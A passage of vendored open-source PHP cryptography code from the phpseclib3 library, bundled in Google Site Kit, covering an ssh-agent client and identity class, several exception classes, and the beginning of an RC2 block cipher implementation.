($this->key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Only DSA and EC keys support signature format setting'); } if ($format != 'SSH2') { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Only SSH2-formatted signatures are currently supported'); } return $this; } /** * Returns the curve * * Returns a string if it's a named curve, an array if not * * @return string|array */ public function getCurve() { if (!$this->key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('Only EC keys have curves'); } return $this->key->getCurve(); } /** * Create a signature * * See "2.6.2 Protocol 2 private key signature request" * * @param string $message * @return string * @throws \RuntimeException on connection errors * @throws UnsupportedAlgorithmException if the algorithm is unsupported */ public function sign($message) { // the last parameter (currently 0) is for flags and ssh-agent only defines one flag (for ssh-dss): SSH_AGENT_OLD_SIGNATURE $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('CssN', \Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Agent::SSH_AGENTC_SIGN_REQUEST, $this->key_blob, $message, $this->flags); $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $packet); if (\strlen($packet) != \fputs($this->fsock, $packet)) { throw new \RuntimeException('Connection closed during signing'); } $length = \current(\unpack('N', $this->readBytes(4))); $packet = $this->readBytes($length); list($type, $signature_blob) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('Cs', $packet); if ($type != \Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Agent::SSH_AGENT_SIGN_RESPONSE) { throw new \RuntimeException('Unable to retrieve signature'); } if (!$this->key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA) { return $signature_blob; } list($type, $signature_blob) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $signature_blob); return $signature_blob; } /** * Returns the private key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { throw new \RuntimeException('ssh-agent does not provide a mechanism to get the private key'); } /** * Sets the password * * @param string|bool $password * @return never */ public function withPassword($password = \false) { throw new \RuntimeException('ssh-agent does not provide a mechanism to get the private key'); } /** * Sets the comment */ public function withComment($comment = null) { $new = clone $this; $new->comment = $comment; return $new; } /** * Returns the comment * * @return null|string */ public function getComment() { return $this->comment; } } <?php /** * Pure-PHP ssh-agent client. * * {@internal See http://api.libssh.org/rfc/PROTOCOL.agent} * * PHP version 5 * * Here are some examples of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $agent = new \phpseclib3\System\SSH\Agent(); * * $ssh = new \phpseclib3\Net\SSH2('www.domain.tld'); * if (!$ssh->login('username', $agent)) { * exit('Login Failed'); * } * * echo $ssh->exec('pwd'); * echo $ssh->exec('ls -la'); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2014 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\System\SSH; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\PublicKeyLoader; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException; use Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2; use Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Agent\Identity; /** * Pure-PHP ssh-agent client identity factory * * requestIdentities() method pumps out \phpseclib3\System\SSH\Agent\Identity objects * * @author Jim Wigginton <terrafrost@php.net> */ class Agent { use Common\Traits\ReadBytes; // Message numbers // to request SSH1 keys you have to use SSH_AGENTC_REQUEST_RSA_IDENTITIES (1) const SSH_AGENTC_REQUEST_IDENTITIES = 11; // this is the SSH2 response; the SSH1 response is SSH_AGENT_RSA_IDENTITIES_ANSWER (2). const SSH_AGENT_IDENTITIES_ANSWER = 12; // the SSH1 request is SSH_AGENTC_RSA_CHALLENGE (3) const SSH_AGENTC_SIGN_REQUEST = 13; // the SSH1 response is SSH_AGENT_RSA_RESPONSE (4) const SSH_AGENT_SIGN_RESPONSE = 14; // Agent forwarding status // no forwarding requested and not active const FORWARD_NONE = 0; // request agent forwarding when opportune const FORWARD_REQUEST = 1; // forwarding has been request and is active const FORWARD_ACTIVE = 2; /** * Unused */ const SSH_AGENT_FAILURE = 5; /** * Socket Resource * * @var resource */ private $fsock; /** * Agent forwarding status * * @var int */ private $forward_status = self::FORWARD_NONE; /** * Buffer for accumulating forwarded authentication * agent data arriving on SSH data channel destined * for agent unix socket * * @var string */ private $socket_buffer = ''; /** * Tracking the number of bytes we are expecting * to arrive for the agent socket on the SSH data * channel * * @var int */ private $expected_bytes = 0; /** * Default Constructor * * @return Agent * @throws BadConfigurationException if SSH_AUTH_SOCK cannot be found * @throws \RuntimeException on connection errors */ public function __construct($address = null) { if (!$address) { switch (\true) { case isset($_SERVER['SSH_AUTH_SOCK']): $address = $_SERVER['SSH_AUTH_SOCK']; break; case isset($_ENV['SSH_AUTH_SOCK']): $address = $_ENV['SSH_AUTH_SOCK']; break; default: throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException('SSH_AUTH_SOCK not found'); } } if (\in_array('unix', \stream_get_transports())) { $this->fsock = \fsockopen('unix://' . $address, 0, $errno, $errstr); if (!$this->fsock) { throw new \RuntimeException("Unable to connect to ssh-agent (Error {$errno}: {$errstr})"); } } else { if (\substr($address, 0, 9) != '\\\\.\\pipe\\' || \strpos(\substr($address, 9), '\\') !== \false) { throw new \RuntimeException('Address is not formatted as a named pipe should be'); } $this->fsock = \fopen($address, 'r+b'); if (!$this->fsock) { throw new \RuntimeException('Unable to open address'); } } } /** * Request Identities * * See "2.5.2 Requesting a list of protocol 2 keys" * Returns an array containing zero or more \phpseclib3\System\SSH\Agent\Identity objects * * @return array * @throws \RuntimeException on receipt of unexpected packets */ public function requestIdentities() { if (!$this->fsock) { return []; } $packet = \pack('NC', 1, self::SSH_AGENTC_REQUEST_IDENTITIES); if (\strlen($packet) != \fputs($this->fsock, $packet)) { throw new \RuntimeException('Connection closed while requesting identities'); } $length = \current(\unpack('N', $this->readBytes(4))); $packet = $this->readBytes($length); list($type, $keyCount) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('CN', $packet); if ($type != self::SSH_AGENT_IDENTITIES_ANSWER) { throw new \RuntimeException('Unable to request identities'); } $identities = []; for ($i = 0; $i < $keyCount; $i++) { list($key_blob, $comment) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $packet); $temp = $key_blob; list($key_type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $temp); switch ($key_type) { case 'ssh-rsa': case 'ssh-dss': case 'ssh-ed25519': case 'ecdsa-sha2-nistp256': case 'ecdsa-sha2-nistp384': case 'ecdsa-sha2-nistp521': $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\PublicKeyLoader::load($key_type . ' ' . \base64_encode($key_blob)); } // resources are passed by reference by default if (isset($key)) { $identity = (new \Google\Site_Kit_Dependencies\phpseclib3\System\SSH\Agent\Identity($this->fsock))->withPublicKey($key)->withPublicKeyBlob($key_blob)->withComment($comment); $identities[] = $identity; unset($key); } } return $identities; } /** * Returns the SSH Agent identity matching a given public key or null if no identity is found * * @return ?Identity */ public function findIdentityByPublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey $key) { $identities = $this->requestIdentities(); $key = (string) $key; foreach ($identities as $identity) { if ((string) $identity->getPublicKey() == $key) { return $identity; } } return null; } /** * Signal that agent forwarding should * be requested when a channel is opened * * @return void */ public function startSSHForwarding() { if ($this->forward_status == self::FORWARD_NONE) { $this->forward_status = self::FORWARD_REQUEST; } } /** * Request agent forwarding of remote server * * @param SSH2 $ssh * @return bool */ private function request_forwarding(\Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2 $ssh) { if (!$ssh->requestAgentForwarding()) { return \false; } $this->forward_status = self::FORWARD_ACTIVE; return \true; } /** * On successful channel open * * This method is called upon successful channel * open to give the SSH Agent an opportunity * to take further action. i.e. request agent forwarding * * @param SSH2 $ssh */ public function registerChannelOpen(\Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2 $ssh) { if ($this->forward_status == self::FORWARD_REQUEST) { $this->request_forwarding($ssh); } } /** * Forward data to SSH Agent and return data reply * * @param string $data * @return string Data from SSH Agent * @throws \RuntimeException on connection errors */ public function forwardData($data) { if ($this->expected_bytes > 0) { $this->socket_buffer .= $data; $this->expected_bytes -= \strlen($data); } else { $agent_data_bytes = \current(\unpack('N', $data)); $current_data_bytes = \strlen($data); $this->socket_buffer = $data; if ($current_data_bytes != $agent_data_bytes + 4) { $this->expected_bytes = $agent_data_bytes + 4 - $current_data_bytes; return \false; } } if (\strlen($this->socket_buffer) != \fwrite($this->fsock, $this->socket_buffer)) { throw new \RuntimeException('Connection closed attempting to forward data to SSH agent'); } $this->socket_buffer = ''; $this->expected_bytes = 0; $agent_reply_bytes = \current(\unpack('N', $this->readBytes(4))); $agent_reply_data = $this->readBytes($agent_reply_bytes); $agent_reply_data = \current(\unpack('a*', $agent_reply_data)); return \pack('Na*', $agent_reply_bytes, $agent_reply_data); } } <?php /** * FileNotFoundException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * FileNotFoundException * * @author Jim Wigginton <terrafrost@php.net> */ class FileNotFoundException extends \RuntimeException { } <?php /** * BadModeException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * BadModeException * * @author Jim Wigginton <terrafrost@php.net> */ class BadModeException extends \RuntimeException { } <?php namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * Indicates an absent or malformed packet length header */ class InvalidPacketLengthException extends \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException { } <?php /** * BadDecryptionException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * BadDecryptionException * * @author Jim Wigginton <terrafrost@php.net> */ class BadDecryptionException extends \RuntimeException { } <?php /** * UnableToConnectException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * UnableToConnectException * * @author Jim Wigginton <terrafrost@php.net> */ class UnableToConnectException extends \RuntimeException { } <?php namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * Indicates a timeout awaiting server response */ class TimeoutException extends \RuntimeException { } <?php /** * NoSupportedAlgorithmsException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * NoSupportedAlgorithmsException * * @author Jim Wigginton <terrafrost@php.net> */ class NoSupportedAlgorithmsException extends \RuntimeException { } <?php /** * InconsistentSetupException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * InconsistentSetupException * * @author Jim Wigginton <terrafrost@php.net> */ class InconsistentSetupException extends \RuntimeException { } <?php /** * InsufficientSetupException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * InsufficientSetupException * * @author Jim Wigginton <terrafrost@php.net> */ class InsufficientSetupException extends \RuntimeException { } <?php /** * UnsupportedAlgorithmException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * UnsupportedAlgorithmException * * @author Jim Wigginton <terrafrost@php.net> */ class UnsupportedAlgorithmException extends \RuntimeException { } <?php /** * NoKeyLoadedException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * NoKeyLoadedException * * @author Jim Wigginton <terrafrost@php.net> */ class NoKeyLoadedException extends \RuntimeException { } <?php /** * UnsupportedOperationException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * UnsupportedOperationException * * @author Jim Wigginton <terrafrost@php.net> */ class UnsupportedOperationException extends \RuntimeException { } <?php /** * UnsupportedCurveException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * UnsupportedCurveException * * @author Jim Wigginton <terrafrost@php.net> */ class UnsupportedCurveException extends \RuntimeException { } <?php /** * ConnectionClosedException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * ConnectionClosedException * * @author Jim Wigginton <terrafrost@php.net> */ class ConnectionClosedException extends \RuntimeException { } <?php /** * UnsupportedFormatException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * UnsupportedFormatException * * @author Jim Wigginton <terrafrost@php.net> */ class UnsupportedFormatException extends \RuntimeException { } <?php /** * BadConfigurationException * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Exception; /** * BadConfigurationException * * @author Jim Wigginton <terrafrost@php.net> */ class BadConfigurationException extends \RuntimeException { } <?php /** * Pure-PHP implementation of RC2. * * Uses mcrypt, if available, and an internal implementation, otherwise. * * PHP version 5 * * Useful resources are as follows: * * - {@link http://tools.ietf.org/html/rfc2268} * * Here's a short example of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $rc2 = new \phpseclib3\Crypt\RC2('ctr'); * * $rc2->setKey('abcdefgh'); * * $plaintext = str_repeat('a', 1024); * * echo $rc2->decrypt($rc2->encrypt($plaintext)); * ?> * </code> * * @author Patrick Monnerat <pm@datasphere.ch> * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\BlockCipher; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadModeException; /** * Pure-PHP implementation of RC2. * */ class RC2 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\BlockCipher { /** * Block Length of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::block_size * @var int */ protected $block_size = 8; /** * The Key * * @see \phpseclib3\Crypt\Common\SymmetricKey::key * @see self::setKey() * @var string */ protected $key; /** * The Original (unpadded) Key * * @see \phpseclib3\Crypt\Common\SymmetricKey::key * @see self::setKey() * @see self::encrypt() * @see self::decrypt() * @var string */ private $orig_key; /** * Key Length (in bytes) * * @see \phpseclib3\Crypt\RC2::setKeyLength() * @var int */ protected $key_length = 16; // = 128 bits /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'rc2'; /** * Optimizing value while CFB-encrypting * * @see \phpseclib3\Crypt\Common\SymmetricKey::cfb_init_len * @var int */ protected $cfb_init_len = 500; /** * The key length in bits. * * {@internal Should be in range [1..1024].} * * {@internal Changing this value after setting the key has no effect.} * * @see self::setKeyLength() * @see self::setKey() * @var int */ private $default_key_length = 1024; /** * The key length in bits. * * {@internal Should be in range [1..1024].} * * @see self::isValidEnine() * @see self::setKey() * @var int */ private $current_key_length; /** * The Key Schedule * * @see self::setupKey() * @var array */ private $keys; /** * Key expansion randomization table. * Twice the same 256-value sequence to save a modulus in key expansion. * * @see self::setKey() * @var array */ private static $pitable = [0xd9, 0x78, 0xf9, 0xc4, 0x19, 0xdd, 0xb5, 0xed, 0x28, 0xe9, 0xfd, 0x79, 0x4a, 0xa0, 0xd8, 0x9d, 0xc6, 0x7e, 0x37, 0x83, 0x2b, 0x76, 0x53, 0x8e, 0x62, 0x4c, 0x64, 0x88, 0x44, 0x8b, 0xfb, 0xa2, 0x17, 0x9a, 0x59, 0xf5, 0x87, 0xb3, 0x4f, 0x13, 0x61, 0x45, 0x6d, 0x8d, 0x9, 0x81, 0x7d, 0x32, 0xbd, 0x8f, 0x40, 0xeb, 0x86, 0xb7, 0x7b, 0xb, 0xf0, 0x95, 0x21, 0x22, 0x5c, 0x6b, 0x4e, 0x82, 0x54, 0xd6, 0x65, 0x93, 0xce, 0x60, 0xb2, 0x1c, 0x73, 0x56, 0xc0, 0x14, 0xa7, 0x8c, 0xf1, 0xdc, 0x12, 0x75, 0xca, 0x1f, 0x3b, 0xbe, 0xe4, 0xd1, 0x42, 0x3d, 0xd4, 0x30, 0xa3, 0x3c, 0xb6, 0x26, 0x6f, 0xbf, 0xe, 0xda, 0x46, 0x69, 0x7, 0x57, 0x27, 0xf2, 0x1d, 0x9b, 0xbc, 0x94, 0x43, 0x3, 0xf8, 0x11, 0xc7, 0xf6, 0x90, 0xef, 0x3e, 0xe7, 0x6, 0xc3, 0xd5, 0x2f, 0xc8, 0x66, 0x1e, 0xd7, 0x8, 0xe8, 0xea, 0xde, 0x80, 0x52, 0xee, 0xf7, 0x84, 0xaa, 0x72, 0xac, 0x35, 0x4d, 0x6a, 0x2a, 0x96, 0x1a, 0xd2, 0x71, 0x5a, 0x15, 0x49, 0x74, 0x4b, 0x9f, 0xd0, 0x5e, 0x4, 0x18, 0xa4, 0xec, 0xc2, 0xe0, 0x41, 0x6e, 0xf, 0x51, 0xcb, 0xcc, 0x24, 0x91, 0xaf, 0x50, 0xa1, 0xf4, 0x70, 0x39, 0x99, 0x7c, 0x3a, 0x85, 0x23, 0xb8, 0xb4, 0x7a, 0xfc, 0x2, 0x36, 0x5b, 0x25, 0x55, 0x97, 0x31, 0x2d, 0x5d, 0xfa, 0x98, 0xe3, 0x8a, 0x92, 0xae, 0x5, 0xdf, 0x29, 0x10, 0x67, 0x6c, 0xba, 0xc9, 0xd3, 0x0, 0xe6, 0xcf, 0xe1, 0x9e, 0xa8, 0x2c, 0x63, 0x16, 0x1, 0x3f, 0x58, 0xe2, 0x89, 0xa9, 0xd, 0x38, 0x34, 0x1b, 0xab, 0x33, 0xff, 0xb0, 0xbb, 0x48, 0xc, 0x5f, 0xb9, 0xb1, 0xcd, 0x2e, 0xc5, 0xf3, 0xdb, 0x47, 0xe5, 0xa5, 0x9c, 0x77, 0xa, 0xa6, 0x20, 0x68, 0xfe, 0x7f, 0xc1, 0xad, 0xd9, 0x78, 0xf9, 0xc4, 0x19, 0xdd, 0xb5, 0xed, 0x28, 0xe9, 0xfd, 0x79, 0x4a, 0xa0, 0xd8, 0x9d, 0xc6, 0x7e, 0x37, 0x83, 0x2b, 0x76, 0x53, 0x8e, 0x62, 0x4c, 0x64, 0x88, 0x44, 0x8b, 0xfb, 0xa2, 0x17, 0x9a, 0x59, 0xf5, 0x87, 0xb3, 0x4f, 0x13, 0x61, 0x45, 0x6d, 0x8d, 0x9, 0x81, 0x7d, 0x32, 0xbd, 0x8f, 0x40, 0xeb, 0x86, 0xb7, 0x7b, 0xb, 0xf0, 0x95, 0x21, 0x22, 0x5c, 0x6b, 0x4e, 0x82, 0x54, 0xd6, 0x65, 0x93, 0xce, 0x60, 0xb2, 0x1c, 0x73, 0x56, 0xc0, 0x14, 0xa7, 0x8c, 0xf1, 0xdc, 0x12, 0x75, 0xca, 0x1f, 0x3b, 0xbe, 0xe4, 0xd1, 0x42, 0x3d, 0xd4, 0x30, 0xa3, 0x3c, 0xb6, 0x26, 0x6f, 0xbf, 0xe, 0xda, 0x46, 0x69, 0x7, 0x57, 0x27, 0xf2, 0x1d, 0x9b, 0xbc, 0x94, 0x43, 0x3, 0xf8, 0x11, 0xc7, 0xf6, 0x90, 0xef, 0x3e, 0xe7, 0x6, 0xc3, 0xd5, 0x2f, 0xc8, 0x66, 0x1e, 0xd7, 0x8, 0xe8, 0xea, 0xde, 0x80, 0x52, 0xee, 0xf7, 0x84, 0xaa, 0x72, 0xac, 0x35, 0x4d, 0x6a, 0x2a, 0x96, 0x1a, 0xd2, 0x71, 0x5a, 0x15, 0x49, 0x74, 0x4b, 0x9f, 0xd0, 0x5e, 0x4, 0x18, 0xa4, 0xec, 0xc2, 0xe0, 0x41, 0x6e, 0xf, 0x51, 0xcb, 0xcc, 0x24, 0x91, 0xaf, 0x50, 0xa1, 0xf4, 0x70, 0x39, 0x99, 0x7c, 0x3a, 0x85, 0x23, 0xb8, 0xb4, 0x7a, 0xfc, 0x2, 0x36, 0x5b, 0x25, 0x55, 0x97, 0x31, 0x2d, 0x5d, 0xfa, 0x98, 0xe3, 0x8a, 0x92, 0xae, 0x5, 0xdf, 0x29, 0x10, 0x67, 0x6c, 0xba, 0xc9, 0xd3, 0x0, 0xe6, 0xcf, 0xe1, 0x9e, 0xa8, 0x2c, 0x63, 0x16, 0x1, 0x3f, 0x58, 0xe2, 0x89, 0xa9, 0xd, 0x38, 0x34, 0x1b, 0xab, 0x33, 0xff, 0xb0, 0xbb, 0x48, 0xc, 0x5f, 0xb9, 0xb1, 0xcd, 0x2e, 0xc5, 0xf3, 0xdb, 0x47, 0xe5, 0xa5, 0x9c, 0x77, 0xa, 0xa6, 0x20, 0x68, 0xfe, 0x7f, 0xc1, 0xad]; /** * Inverse key expansion randomization table. * * @see self::setKey() * @var array */ private static $invpitable = [0xd1, 0xda, 0xb9, 0x6f, 0x9c, 0xc8, 0x78, 0x66, 0x80, 0x2c, 0xf8, 0x37, 0xea, 0xe0, 0x62, 0xa4, 0xcb, 0x71, 0x50, 0x27, 0x4b, 0x95, 0xd9, 0x20, 0x9d, 0x4, 0x91, 0xe3, 0x47, 0x6a, 0x7e, 0x53, 0xfa, 0x3a, 0x3b, 0xb4, 0xa8, 0xbc, 0x5f, 0x68, 0x8, 0xca, 0x8f, 0x14, 0xd7, 0xc0, 0xef, 0x7b, 0x5b, 0xbf, 0x2f, 0xe5, 0xe2, 0x8c, 0xba, 0x12, 0xe1, 0xaf, 0xb2, 0x54, 0x5d, 0x59, 0x76, 0xdb, 0x32, 0xa2, 0x58, 0x6e, 0x1c, 0x29, 0x64, 0xf3, 0xe9, 0x96, 0xc, 0x98, 0x19, 0x8d, 0x3e, 0x26, 0xab, 0xa5, 0x85, 0x16, 0x40, 0xbd, 0x49, 0x67, 0xdc, 0x22, 0x94, 0xbb, 0x3c, 0xc1, 0x9b, 0xeb, 0x45, 0x28, 0x18, 0xd8, 0x1a, 0x42, 0x7d, 0xcc, 0xfb, 0x65, 0x8e, 0x3d, 0xcd, 0x2a, 0xa3, 0x60, 0xae, 0x93, 0x8a, 0x48, 0x97, 0x51, 0x15, 0xf7, 0x1, 0xb, 0xb7, 0x36, 0xb1, 0x2e, 0x11, 0xfd, 0x84, 0x2d, 0x3f, 0x13, 0x88, 0xb3, 0x34, 0x24, 0x1b, 0xde, 0xc5, 0x1d, 0x4d, 0x2b, 0x17, 0x31, 0x74, 0xa9, 0xc6, 0x43, 0x6d, 0x39, 0x90, 0xbe, 0xc3, 0xb0, 0x21, 0x6b, 0xf6, 0xf, 0xd5, 0x99, 0xd, 0xac, 0x1f, 0x5c, 0x9e, 0xf5, 0xf9, 0x4c, 0xd6, 0xdf, 0x89, 0xe4, 0x8b, 0xff, 0xc7, 0xaa, 0xe7, 0xed, 0x46, 0x25, 0xb6, 0x6, 0x5e, 0x35, 0xb5, 0xec, 0xce, 0xe8, 0x6c, 0x30, 0x55, 0x61, 0x4a, 0xfe, 0xa0, 0x79, 0x3, 0xf0, 0x10, 0x72, 0x7c, 0xcf, 0x52, 0xa6, 0xa7, 0xee, 0x44, 0xd3, 0x9a, 0x57, 0x92, 0xd0, 0x5a, 0x7a, 0x41, 0x7f, 0xe, 0x0, 0x63, 0xf2, 0x4f, 0x5, 0x83, 0xc9, 0xa1, 0xd4, 0xdd, 0xc4, 0x56, 0xf4, 0xd2, 0x77, 0x81, 0x9, 0x82, 0x33, 0x9f, 0x7, 0x86, 0x75, 0x38, 0x4e, 0x69, 0xf1, 0xad, 0x23, 0x73, 0x87, 0x70, 0x2, 0xc2, 0x1e, 0xb8, 0xa, 0xfc, 0xe6]; /** * Default Constructor. * * @param string $mode * @throws \InvalidArgumentException if an invalid / unsupported mode is provided */ public function __construct($mode) { parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadModeException('Block ciphers cannot be ran in stream mode'); } } /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { switch ($engine) { case self::ENGINE_OPENSSL: if ($this->current_key_length != 128 || \strlen($this->orig_key) < 16) { return \false; } // quoting https://www.openssl.org/news/openssl-3.0-notes.html, OpenSSL 3.0.1 // "Moved all variations of the EVP ciphers CAST5, BF, IDEA, SEED, RC2, RC4, RC5, and DES to the legacy provider" // in theory openssl_get_cipher_methods() should catch this but, on GitHub Actions, at least, it does not if (\defined('OPENSSL_VERSION_TEXT') && \version_compare(\preg_replace('#OpenSSL (\\d+\\.\\d+\\.\\d+) .*#', '$1', \OPENSSL_VERSION_TEXT), '3.0.1', '>=')) { return \false; } $this->cipher_name_openssl_ecb = 'rc2-ecb'; $this->cipher_name_openssl = 'rc2-' . $this->openssl_translate_mode(); } return parent::isValidEngineHelper($engine); } /** * Sets the key length. * * Valid key lengths are 8 to 1024. * Calling this function after setting the key has no effect until the next * \phpseclib3\Crypt\RC2::setKey() call. * * @param int $length in bits * @throws \LengthException if the key length isn't supported */ public function setKeyLength($length) { if ($length < 8 || $length > 1024) { throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys between 1 and 1024 bits, inclusive, are supported'); } $this->default_key_length = $this->current_key_length = $length; $this->explicit_key_length = $length >> 3; } /** * Returns the current key length * * @return int */ public function getKeyLength() { return $this->current_key_length; } /** * Sets the key. * * Keys can be of any length. RC2, itself, uses 8 to 1024 bit keys (eg. * strlen($key) <= 128), however, we only use the first 128 bytes if $key * has more then 128 bytes in it, and set $key to a single null byte if * it is empty. * * @see \phpseclib3\Crypt\Common\SymmetricKey::setKey() * @param string $key * @param int|boolean $t1 optional Effective key length in bits. * @throws \LengthException if the key length isn't supported */ public function setKey($key, $t1 = \false) { $this->orig_key = $key; if ($t1 === \false) { $t1 = $this->default_key_length; } if ($t1 < 1 || $t1 > 1024) { throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys between 1 and 1024 bits, inclusive, are supported'); } $this->current_key_length = $t1; if (\strlen($key) < 1 || \strlen($key) > 128) { throw new \LengthException('Key of size ' . \strlen($key) . ' not supported by this algorithm. Only keys of sizes between 8 and 1024 bits, inclusive, are supported'); } $t = \strlen($key); // The mcrypt RC2 implementation only supports effective key length // of 1024 bits. It is however possible to handle effective key // lengths in range 1..1024 by expanding the key and applying // inverse pitable mapping to the first byte before submitting it // to mcrypt. // Key expansion. $l = \array_values(\unpack('C*', $key)); $t8 = $t1 + 7 >> 3; $tm = 0xff >> 8 * $t8 - $t1; // Expand key. $pitable = self::$pitable; for ($i = $t; $i < 128; $i++) { $l[$i] = $pitable[$l[$i - 1] + $l[$i - $t]]; } $i = 128 - $t8; $l[$i] = $pitable[$l[$i] & $tm]; while ($i--) { $l[$i] = $pitable[$l[$i + 1] ^ $l[$i + $t8]]; } // Prepare the key for mcrypt. $l[0] = self::$invpitable[$l[0]]; \array_unshift($l, 'C*'); $this->key = 